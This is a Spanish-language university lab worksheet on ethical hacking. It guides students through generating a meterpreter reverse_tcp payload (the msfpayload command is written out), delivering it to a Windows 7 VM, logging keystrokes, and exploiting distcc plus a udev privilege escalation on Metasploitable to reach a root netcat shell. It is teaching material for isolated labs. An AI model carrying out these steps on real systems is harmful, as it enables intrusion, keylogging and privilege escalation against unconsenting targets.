Anda di halaman 1dari 10

Escuela de Informtica y Telecomunicaciones

PDA
Actividad de Aprendizaje

ACTIVIDAD DE APRENDIZAJE
Carrera/s Ingeniera en Conectividad y Redes
Sigla Curso GRC 6501
Modalidad Presencial
Versin PDA 2014
Forma de trabajo x Individual
Grupal
Sala de clases
Infraestructura (lugar) x Laboratorio (especifique)
Terreno (especifique)
Otros (especifique)
- Computador personal por cada alumno
Material de apoyo (insumos y equipamiento) para la - Computador personal profesor
actividad - Mquina Virtual Kali

NOMBRE DE LA ACTIVIDAD
Explotacin de vulnerabilidades
DESCRIPCIN DE LA ACTIVIDAD
El estudiante desarrolla en esta actividad las competencias para realizar un hacking tico a un
sistema vulnerable, con herramientas OPenSource

Introduccin:
Las tcnicas de Hacking tico son utilizadas en las empresas, principalmente, para generar la
evidencia necesaria de que el sistema es vulnerable, por lo que el estudiante deber realizar la
evaluacin de seguridad y a continuacin penetrar el sistema para generar las evidencias
necesarias

Desarrollo:
- Instalacin de mquina virtual Kali Linux
- Ejecucin de exploit multi/handler
- Uso de payload meterpreter
- Generacin de evidencia con meterpreter
- Escalamiento de privilegios en servidores Linux

Evaluacin (desarrollar en la pauta correspondiente)


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

Actividad prctica:

Formato: Individual

Asignatura: Gestion de Riesgos en Redes Corporativas

Cdigo: GRC 6501

Objetivo: Realizar experiencia de exploit en Windows 7

1.- Levante la mquina virtual Windows 7 provista por su profesor, con la interfaz de red en modo
anfitrin

2.- Levante su mquina virtual Kali Linux en modo anfitrin

3.- Inicie la aplicacin Metasploit

4.- Genere un virus con la aplicacin "meterpreter" usando el siguiente comando:

# msf> msfpayload windows/meterpreter/reverse_tcp LHOST=ip_local X > nombre_virus

5.- Compruebe la creacin del archivo con el comando:

# msf> ls -l
Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

Servidor web para transferir el virus a la maquina victima

6.- Cree el directorio /var/www/share

7.- Cambie los permisos del directorio creado

8.- Cambie el propietario del directorio al usuario "www-data"

9.- A continuacin levante el servicio web apache

10.- Copie el archivo del virus al directorio del servidor web


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

11.- Desde el browser de su mquina virtual Windows 7, conctese al servidor web creado en su
mquina Kali Linux

12.- Baje el archivo del virus y cpielo a algn directorio local


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

Ejecucin del exploit

13.- Desde la consola de metasploit, ejecute exploit/multi/handler

14.- Agregue el payload de "meterpreter" y configure la direccion Ip de su maquina local

15.- A continuacin, ejecute el exploit


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

16.- En la mquina virtual Windows 7, ejecute el archivo de virus

17.- Observe la consola de metasploit

18.- Realice alguna operacin de meterpreter, como lectura de teclado


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

Ttulo: Escalamiento de privilegios

Escalamiento de privilegios en Linux

1.- Levante la aplicacin Kali Linux con la interfaz de red en modo puente

2.- Instale la aplicacin Metasploitable con la interfaz de red en modo puente

3.- Realice un footprinting al puerto de servicio 3632 en la maquina Metasploitable

4.- Ejecute la aplicacin msfconsole en su mquina Kali y busque un exploit asociado al servicio
mencionado.

5.- Ejecute el exploit encontrado y configure los parmetros correspondientes:

6.- Busque un payload que permita ejecutar comandos en forma remota.


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

7.- Cargue el payload seleccionado y configure los parmetros adicionales.

8.- Ejecute el exploit confirme el usuario con el cual est conectado.

Hasta ahora, hemos logrado explotar la conexin remota, pero con un usuario de bajo privilegio.

9.- Ejecute el siguiente comando para visualizar el servicio "udev"

10.- Busque una vulnerabilidad, en el sitio CVE que permita lo siguiente:

- Vendor: kernel (Linux)

- Product: udev

- Public exploit: ok

- Vulnerability type: Gain Access

- Gained Access: Admin


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

11.- Busque el exploit, usando el cdigo CVE, en el sitio:

http://www.exploit-db.com/search/

12.- Baje el exploit en su mquina vctima, usando el siguiente comando:

13.- A continuacin renombre el archivo "index.html"

14.- Compile el exploit en la maquina victima


Escuela de Informtica y Telecomunicaciones
PDA
Actividad de Aprendizaje

15.- Lea las instrucciones del exploit, del sitio exploit-db

16.- Cree el script como se muestra a continuacin:

17.- A continuacin, levante un tnel en el puerto 4444 en su mquina Kali Linux:

18.- Obtenga el PID del servicio udev

19.- Ejecute el exploit creado con el argumento adecuado (PID menos 1)

20.- Confirme en la ventana del tnel netcat, que puede conectarse con privilegios de root

21.- Responda:

Cul fue la vulnerabilidad explotada en este caso?

Por qu razn es necesario primero realizar el acceso y luego conectarse como root?

Anda mungkin juga menyukai